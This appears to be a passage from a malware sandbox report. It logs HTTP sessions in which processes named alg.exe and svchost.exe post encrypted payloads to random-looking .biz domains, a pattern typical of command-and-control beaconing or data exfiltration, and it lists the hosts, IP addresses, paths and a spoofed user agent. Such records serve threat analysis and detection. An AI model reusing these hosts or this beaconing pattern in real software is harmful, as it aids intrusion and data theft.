                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              81192.168.2.45004013.251.16.150802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.466185093 CEST344OUTPOST /tw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.466206074 CEST778OUTData Raw: c4 32 5b 34 a1 a2 35 6a fe 02 00 00 88 5c 56 fa cb a4 7e 44 18 f6 ee bf 26 07 29 e4 39 cb d7 53 b5 ef c4 6b c5 05 e2 1f d2 b3 3f 37 91 5c fc 0f 4d b9 1a 00 18 1d 17 14 74 ef 18 c5 2c 2c 1e 63 32 13 42 57 cd c4 33 a3 3d 4c d6 d1 9d 49 49 2e e8 70
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 2[45j\V~D&)9Sk?7\Mt,,c2BW3=LII.p\KqEu&Lg]"[KGrd-_z+HcjPwc_NR#C;!!s5/3BJAY~OuE,j[4SlX`F";N=l2:N"(@
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.821372986 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=54166ffff4011c47c38a4ae9255b1470|8.46.123.33|1728394150|1728394150|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              82192.168.2.4500463.94.10.34804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.265788078 CEST347OUTPOST /pa HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.265824080 CEST786OUTData Raw: 67 f7 71 70 5f 3e 4b 15 06 03 00 00 e2 b8 b7 bc 6d d4 43 0d e1 69 6d 85 e4 a4 ea 72 3a b8 b4 03 aa f5 4e fe b6 6d 1d 71 24 4e 7c 4f 73 33 3e e9 d0 58 0c 6e e7 58 dc b7 3d 1c b7 d0 10 89 04 a4 ce a9 e9 41 5b da 82 0a d1 c3 4d f2 05 b7 27 a9 9e df
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: gqp_>KmCimr:Nmq$N|Os3>XnX=A[M'ns.hQ=NUEo]58IK'hH\:de]>j%t'+qItJrke"y!n1)
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.748672962 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=e24056a60dc3f73560a60443534bc5eb|8.46.123.33|1728394150|1728394150|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              83192.168.2.45005144.213.104.86804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.970066071 CEST345OUTPOST /yp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.970091105 CEST786OUTData Raw: c5 2e 9b 49 92 2e a4 4d 06 03 00 00 80 bb f0 4d 1c f3 c5 69 f3 36 87 ce ff 53 2c fb f9 bd a5 b7 8a 1c 7e f5 6c 2f 74 2b e6 23 38 6c 51 05 a1 e5 01 8f a0 d2 05 74 e7 78 78 c7 24 c7 7c 66 27 e4 2b 5d 0f a1 93 a7 a0 6e 02 39 26 f7 07 40 19 74 c9 a8
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: .I.MMi6S,~l/t+#8lQtxx$|f'+]n9&@t2I#_C[#yN&vsS&<YT[Z+6MVxu?6)r]lmDP8z vg,J KVP6xP}wp".i@~/%
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.445408106 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=b5b9110eff8e1bd9c058db50405941a2|8.46.123.33|1728394151|1728394151|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              84192.168.2.45005313.251.16.150802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.100301027 CEST349OUTPOST /ncst HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.100336075 CEST778OUTData Raw: ca ca 57 b7 70 e5 1a 6f fe 02 00 00 1a e6 6e b5 9a af 01 29 93 80 e3 a5 2e 63 ce 34 dc e6 12 ea 21 bd 61 bd 8b aa 2d b4 89 4e bc 9a 5f 68 dc d4 1e 73 f9 74 09 09 ad 41 97 55 8b 92 2f 9a bc 78 4b 48 5c 2d d2 ce 5a 94 2b f5 0a e1 27 cc ce d3 ce 62
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Wpon).c4!a-N_hstAU/xKH\-Z+'bNJHZs9Yj<_]oyk15c@3q<2'tx0O18no(Cv;:'v+!{[}.4ge98{@nLA)&<&bIHE]M/a
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:12.444242001 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:12 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=dba40d597f8777671a96007f0b135c33|8.46.123.33|1728394152|1728394152|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              85192.168.2.4500563.254.94.185804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.560396910 CEST343OUTPOST /ej HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.560429096 CEST786OUTData Raw: d6 71 69 18 75 91 57 a5 06 03 00 00 e9 e7 77 bc a1 26 42 5a b8 bd 14 02 d7 69 d6 0f bf 29 01 82 32 1e 4a 12 1e f2 f0 f6 4c 34 1e 30 94 63 93 1f 47 dc e7 2e 96 57 95 ca a9 f8 94 43 72 b8 e9 63 a3 60 5a 59 e2 f8 7f 88 da 93 c9 e2 64 8d 6b 81 7b 17
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: qiuWw&BZi)2JL40cG.WCrc`ZYdk{rB+![E17![:j~)V``@Ao<55*kH6av5p*CYCd'.W,sqJC~&@LP9aTQeXHeF
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:12.440227032 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:12 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=7a9b16473fed9da6da3242a70ef4b297|8.46.123.33|1728394152|1728394152|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              86192.168.2.45006385.214.228.140804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:12.618138075 CEST357OUTPOST /ccheohdfgxjtt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:12.618166924 CEST786OUTData Raw: aa 0b a1 9f 90 6f 6a 9f 06 03 00 00 c0 ce c1 83 95 2f a7 19 d9 5d 57 42 f0 ca 66 c9 b0 bd af da 4f a6 8b f0 cc 18 93 f5 36 96 cc 73 b8 9c 4c b7 72 19 69 9b 1a 67 f2 38 42 1c 8e a1 32 03 8e c9 d0 65 ef 28 7e 70 b0 1d 86 c2 df e2 3a 70 7e e0 c8 ca
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: oj/]WBfO6sLrig8B2e(~p:p~@5|~uP3O/-IWv:Qq voAYK0&wApFWFd\;; I{gk&rPPnY@RVd
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.246932030 CEST166INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.27.2
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Keep-Alive: timeout=20
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              87192.168.2.45006834.211.97.45802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:12.810403109 CEST354OUTPOST /eevmjkkfks HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:12.810427904 CEST778OUTData Raw: ff 13 0a fb 57 a9 b2 07 fe 02 00 00 5b c7 f4 31 ae fb 69 5f 64 c8 b1 41 32 52 89 17 6f 2a 6e a3 1f f5 02 b6 64 a5 31 29 e2 5c a5 9c b4 45 6a 64 d4 e0 e7 27 f4 6f 9e 01 4b ea d6 3a 4a f0 d0 1a 73 a4 01 41 07 e6 22 0e 59 95 40 3b d3 a0 64 e3 b5 20
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: W[1i_dA2Ro*nd1)\Ejd'oK:JsA"Y@;d 1Su%}=>2PWFyK%2|cyQoG^XFR|j1\Laxn}^N?PkMAW,rW'>1!g6+7(pW.ssMS* E
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.559310913 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=47e3aa5b25932e7bb7084b5b25e0260e|8.46.123.33|1728394153|1728394153|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              88192.168.2.45007047.129.31.212804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.400556087 CEST356OUTPOST /jqkpdrugusyff HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.400583982 CEST786OUTData Raw: 7a b0 9b 69 c1 26 a1 5e 06 03 00 00 64 84 ce 0d 3a e5 52 b0 0a 3c fd 34 1f 8c 5b 9b 1a bb 91 0c 13 02 b0 8f c8 fd 6e 22 a2 13 65 7c 76 88 ef 72 8a c0 9b cd 70 0a f0 f2 4d a4 cc e3 fa 0e 4f 3f ca 55 2a 16 2e d0 2a 97 53 69 a0 a5 73 6d 0e a2 e9 ad
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: zi&^d:R<4[n"e|vrpMO?U*.*Sism_2[Ga^eQ24G%h\rgTumRa4Nf~7Ic7RhvbTT%ea)[|pI`K'!pa^iv__hz!$8"`}dr:^Sd
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.746372938 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:14 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=9fe1046dfb8f8810f2e07953ef68bd6d|8.46.123.33|1728394154|1728394154|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              89192.168.2.45007547.129.31.212802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.693607092 CEST353OUTPOST /ktcaihfarwj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.693629980 CEST778OUTData Raw: 74 32 96 82 ab d5 16 0c fe 02 00 00 35 91 6d c7 99 50 e8 b1 37 2e 65 f2 68 45 c2 20 d7 7d dd ee df 85 b9 e9 98 24 ee 20 0e 6d 79 35 f3 5e 6f 0d 44 bb 03 63 68 40 3e da 42 01 68 21 95 f6 fc ed 46 d6 7f 14 3b b2 0d 14 fb 5f 2a f3 2c 12 30 95 52 62
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: t25mP7.ehE }$ my5^oDch@>Bh!F;_*,0Rb<EAR6 4yJizoLgwzo~')1"G_LNcb/3.WCK=JwQ;( ~& xK{'KN4M\3/~k3ooF
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.044320107 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:14 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=a340c351fb837a3cefffbd52818dee5b|8.46.123.33|1728394154|1728394154|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              90192.168.2.45008334.211.97.45804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.994684935 CEST344OUTPOST /jqu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.994709969 CEST786OUTData Raw: 04 e6 90 94 ac 68 dd 71 06 03 00 00 ad 99 43 2c f8 35 8f bd 99 74 4c aa 15 15 e5 98 c8 95 33 e8 4e 00 14 85 04 2a 56 52 89 c7 78 41 39 10 84 9f 35 3d 38 aa 81 d6 a2 74 e0 6f 0a 96 59 ae c1 0c 1c 4f cf 88 df 2d 81 18 c5 d7 84 e2 93 61 e8 d4 fe 97
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: hqC,5tL3N*VRxA95=8toYO-aY$H8BKKD0x"EJa|P6fOZC$%`YHk($OZp:,k$e"fvG}=px?A)j
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.721455097 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=5bddb0f92bcf5b520e7b9275dfbbfcdc|8.46.123.33|1728394155|1728394155|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
